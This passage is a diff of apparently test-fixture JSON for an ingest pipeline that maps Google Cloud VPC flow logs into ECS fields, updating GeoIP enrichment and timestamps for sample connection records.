"{\"insertId\":\"198begsfh44xxr\",\"jsonPayload\":{\"bytes_sent\":\"0\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":22,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":14236},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:40:12.064908439Z\",\"packets_sent\":\"3\",\"reporter\":\"DEST\",\"src_location\":{\"asn\":4837,\"city\":\"Shangqiu\",\"continent\":\"Asia\",\"country\":\"chn\",\"region\":\"Henan\"},\"start_time\":\"2019-06-14T03:40:08.247072525Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", + "kind": "event", + "start": "2019-06-14T03:40:08.247072525Z", + "end": "2019-06-14T03:40:12.064908439Z", + "id": "198begsfh44xxr", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -15605,19 +16391,30 @@ "iana_number": "6", "packets": 3, "direction": "inbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:17.291Z", "ecs": { "version": "1.12.0" }, "related": { "ip": [ - "67.43.156.14", - "10.139.99.242" + "10.87.40.76", + "67.43.156.13" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { - "destination": { + "vpcflow": { + "reporter": "SRC", + "rtt": { + "ms": 36 + } + }, + "source": { "vpc": { "project_id": "my-sample-project", "subnetwork_name": "default", @@ -15628,33 +16425,20 @@ "project_id": "my-sample-project", "zone": "us-east1-b" } - }, - "vpcflow": { - "reporter": "DEST" } }, - "event": { - "ingested": "2021-12-09T13:37:46.392040400Z", - "original": "{\"insertId\":\"198begsfh44xxr\",\"jsonPayload\":{\"bytes_sent\":\"0\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":22,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":14236},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:40:12.064908439Z\",\"packets_sent\":\"3\",\"reporter\":\"DEST\",\"src_location\":{\"asn\":4837,\"city\":\"Shangqiu\",\"continent\":\"Asia\",\"country\":\"chn\",\"region\":\"Henan\"},\"start_time\":\"2019-06-14T03:40:08.247072525Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", - "kind": "event", - "start": "2019-06-14T03:40:08.247072525Z", - "end": "2019-06-14T03:40:12.064908439Z", - "id": "198begsfh44xxr", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 60122, @@ -15668,6 +16452,16 @@ "domain": "kibana", "ip": "10.87.40.76" }, + "event": { + "ingested": "2021-12-14T14:43:27.415256047Z", + "original": "{\"insertId\":\"198begsfh44xy2\",\"jsonPayload\":{\"bytes_sent\":\"1781\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":60122,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:41:39.207635184Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:41:39.087226326Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", + "kind": "event", + "start": "2019-06-14T03:41:39.087226326Z", + "end": "2019-06-14T03:41:39.207635184Z", + "id": "198begsfh44xy2", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -15679,7 +16473,9 @@ "iana_number": "6", "packets": 7, "direction": "outbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:17.291Z", "ecs": { "version": "1.12.0" @@ -15690,6 +16486,9 @@ "67.43.156.13" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "vpcflow": { "reporter": "SRC", @@ -15710,28 +16509,18 @@ } } }, - "event": { - "ingested": "2021-12-09T13:37:46.392044800Z", - "original": "{\"insertId\":\"198begsfh44xy2\",\"jsonPayload\":{\"bytes_sent\":\"1781\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":60122,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:41:39.207635184Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:41:39.087226326Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", - "kind": "event", - "start": "2019-06-14T03:41:39.087226326Z", - "end": "2019-06-14T03:41:39.207635184Z", - "id": "198begsfh44xy2", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 53972, @@ -15745,6 +16534,16 @@ "domain": "kibana", "ip": "10.87.40.76" }, + "event": { + "ingested": "2021-12-14T14:43:27.415256480Z", + "original": "{\"insertId\":\"198begsfh44xy6\",\"jsonPayload\":{\"bytes_sent\":\"1782\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":53972,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:44:20.748121914Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:44:20.634231041Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", + "kind": "event", + "start": "2019-06-14T03:44:20.634231041Z", + "end": "2019-06-14T03:44:20.748121914Z", + "id": "198begsfh44xy6", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -15756,65 +16555,30 @@ "iana_number": "6", "packets": 7, "direction": "outbound" + } + }, + { + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" }, - "@timestamp": "2019-06-14T03:50:17.291Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "10.87.40.76", - "67.43.156.13" - ] - }, - "gcp": { - "vpcflow": { - "reporter": "SRC", - "rtt": { - "ms": 36 - } - }, - "source": { - "vpc": { - "project_id": "my-sample-project", - "subnetwork_name": "default", - "vpc_name": "default" - }, - "instance": { - "region": "us-east1", - "project_id": "my-sample-project", - "zone": "us-east1-b" - } - } - }, - "event": { - "ingested": "2021-12-09T13:37:46.392049Z", - "original": "{\"insertId\":\"198begsfh44xy6\",\"jsonPayload\":{\"bytes_sent\":\"1782\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":53972,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:44:20.748121914Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:44:20.634231041Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", - "kind": "event", - "start": "2019-06-14T03:44:20.634231041Z", - "end": "2019-06-14T03:44:20.748121914Z", - "id": "198begsfh44xy6", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, - "destination": { - "address": "10.139.99.242", - "port": 9200, - "domain": "elasticsearch", - "ip": "10.139.99.242" + "destination": { + "address": "10.139.99.242", + "port": 9200, + "domain": "elasticsearch", + "ip": "10.139.99.242" }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 33530, @@ -15886,7 +16650,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.392053400Z", + "ingested": "2021-12-14T14:43:27.415256927Z", "original": "{\"insertId\":\"198begsfh44xxx\",\"jsonPayload\":{\"bytes_sent\":\"68545\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33530},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:52.205089801Z\",\"packets_sent\":\"368\",\"reporter\":\"DEST\",\"rtt_msec\":\"163\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.140301693Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", "kind": "event", "start": "2019-06-14T03:40:00.140301693Z", @@ -15897,9 +16661,39 @@ } }, { + "@timestamp": "2019-06-14T03:50:17.291Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "67.43.156.13", + "10.139.99.242" + ] + }, "log": { "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" }, + "gcp": { + "destination": { + "vpc": { + "project_id": "my-sample-project", + "subnetwork_name": "default", + "vpc_name": "default" + }, + "instance": { + "region": "us-east1", + "project_id": "my-sample-project", + "zone": "us-east1-b" + } + }, + "vpcflow": { + "reporter": "DEST", + "rtt": { + "ms": 209 + } + } + }, "destination": { "address": "10.139.99.242", "port": 9200, @@ -15908,13 +16702,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa", - "city_name": "Broomfield", - "region_name": "Colorado" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 33652 + "number": 35908 }, "address": "67.43.156.13", "port": 65274, @@ -15922,6 +16719,16 @@ "ip": "67.43.156.13", "packets": 745 }, + "event": { + "ingested": "2021-12-14T14:43:27.415257364Z", + "original": "{\"insertId\":\"198begsfh44xy4\",\"jsonPayload\":{\"bytes_sent\":\"74613\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":65274},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.220838853Z\",\"packets_sent\":\"745\",\"reporter\":\"DEST\",\"rtt_msec\":\"209\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:40:01.270996793Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", + "kind": "event", + "start": "2019-06-14T03:40:01.270996793Z", + "end": "2019-06-14T03:49:56.220838853Z", + "id": "198begsfh44xy4", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -15933,7 +16740,9 @@ "iana_number": "6", "packets": 745, "direction": "inbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:17.291Z", "ecs": { "version": "1.12.0" @@ -15944,6 +16753,9 @@ "10.139.99.242" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "destination": { "vpc": { @@ -15960,25 +16772,10 @@ "vpcflow": { "reporter": "DEST", "rtt": { - "ms": 209 + "ms": 176 } } }, - "event": { - "ingested": "2021-12-09T13:37:46.392057800Z", - "original": "{\"insertId\":\"198begsfh44xy4\",\"jsonPayload\":{\"bytes_sent\":\"74613\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":65274},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.220838853Z\",\"packets_sent\":\"745\",\"reporter\":\"DEST\",\"rtt_msec\":\"209\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:40:01.270996793Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", - "kind": "event", - "start": "2019-06-14T03:40:01.270996793Z", - "end": "2019-06-14T03:49:56.220838853Z", - "id": "198begsfh44xy4", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "address": "10.139.99.242", "port": 9200, @@ -15987,13 +16784,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa", - "city_name": "Broomfield", - "region_name": "Colorado" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 33652 + "number": 35908 }, "address": "67.43.156.13", "port": 53879, @@ -16001,6 +16801,16 @@ "ip": "67.43.156.13", "packets": 726 }, + "event": { + "ingested": "2021-12-14T14:43:27.415258130Z", + "original": "{\"insertId\":\"198begsfh44xy1\",\"jsonPayload\":{\"bytes_sent\":\"74942\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":53879},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.312105537Z\",\"packets_sent\":\"726\",\"reporter\":\"DEST\",\"rtt_msec\":\"176\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:40:00.760414869Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", + "kind": "event", + "start": "2019-06-14T03:40:00.760414869Z", + "end": "2019-06-14T03:49:56.312105537Z", + "id": "198begsfh44xy1", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -16012,7 +16822,9 @@ "iana_number": "6", "packets": 726, "direction": "inbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:17.291Z", "ecs": { "version": "1.12.0" @@ -16020,9 +16832,12 @@ "related": { "ip": [ "67.43.156.13", - "10.139.99.242" + "10.87.40.76" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "destination": { "vpc": { @@ -16039,25 +16854,10 @@ "vpcflow": { "reporter": "DEST", "rtt": { - "ms": 176 + "ms": 36 } } }, - "event": { - "ingested": "2021-12-09T13:37:46.392062300Z", - "original": "{\"insertId\":\"198begsfh44xy1\",\"jsonPayload\":{\"bytes_sent\":\"74942\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":53879},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.312105537Z\",\"packets_sent\":\"726\",\"reporter\":\"DEST\",\"rtt_msec\":\"176\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:40:00.760414869Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", - "kind": "event", - "start": "2019-06-14T03:40:00.760414869Z", - "end": "2019-06-14T03:49:56.312105537Z", - "id": "198begsfh44xy1", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "address": "10.87.40.76", "port": 5601, @@ -16066,11 +16866,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 34450, @@ -16078,6 +16883,16 @@ "ip": "67.43.156.13", "packets": 7 }, + "event": { + "ingested": "2021-12-14T14:43:27.415258591Z", + "original": "{\"insertId\":\"198begsfh44xxp\",\"jsonPayload\":{\"bytes_sent\":\"1467\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":34450},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:47:38.299054333Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:47:38.189569840Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", + "kind": "event", + "start": "2019-06-14T03:47:38.189569840Z", + "end": "2019-06-14T03:47:38.299054333Z", + "id": "198begsfh44xxp", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -16089,19 +16904,30 @@ "iana_number": "6", "packets": 7, "direction": "inbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:17.291Z", "ecs": { "version": "1.12.0" }, "related": { "ip": [ - "67.43.156.13", - "10.87.40.76" + "10.139.99.242", + "67.43.156.13" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { - "destination": { + "vpcflow": { + "reporter": "SRC", + "rtt": { + "ms": 209 + } + }, + "source": { "vpc": { "project_id": "my-sample-project", "subnetwork_name": "default", @@ -16112,38 +16938,20 @@ "project_id": "my-sample-project", "zone": "us-east1-b" } - }, - "vpcflow": { - "reporter": "DEST", - "rtt": { - "ms": 36 - } } }, - "event": { - "ingested": "2021-12-09T13:37:46.392066700Z", - "original": "{\"insertId\":\"198begsfh44xxp\",\"jsonPayload\":{\"bytes_sent\":\"1467\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":34450},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:47:38.299054333Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:47:38.189569840Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", - "kind": "event", - "start": "2019-06-14T03:47:38.189569840Z", - "end": "2019-06-14T03:47:38.299054333Z", - "id": "198begsfh44xxp", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa", - "city_name": "Broomfield", - "region_name": "Colorado" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 33652 + "number": 35908 }, "address": "67.43.156.13", "port": 65274, @@ -16157,6 +16965,16 @@ "domain": "elasticsearch", "ip": "10.139.99.242" }, + "event": { + "ingested": "2021-12-14T14:43:27.415259054Z", + "original": "{\"insertId\":\"198begsfh44xxv\",\"jsonPayload\":{\"bytes_sent\":\"121593\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":65274,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:56.220838853Z\",\"packets_sent\":\"610\",\"reporter\":\"SRC\",\"rtt_msec\":\"209\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:01.270996793Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", + "kind": "event", + "start": "2019-06-14T03:40:01.270996793Z", + "end": "2019-06-14T03:49:56.220838853Z", + "id": "198begsfh44xxv", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -16168,25 +16986,24 @@ "iana_number": "6", "packets": 610, "direction": "outbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:17.291Z", "ecs": { "version": "1.12.0" }, "related": { "ip": [ - "10.139.99.242", - "67.43.156.13" + "67.43.156.13", + "10.87.40.76" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { - "vpcflow": { - "reporter": "SRC", - "rtt": { - "ms": 209 - } - }, - "source": { + "destination": { "vpc": { "project_id": "my-sample-project", "subnetwork_name": "default", @@ -16197,23 +17014,14 @@ "project_id": "my-sample-project", "zone": "us-east1-b" } + }, + "vpcflow": { + "reporter": "DEST", + "rtt": { + "ms": 36 + } } }, - "event": { - "ingested": "2021-12-09T13:37:46.392071500Z", - "original": 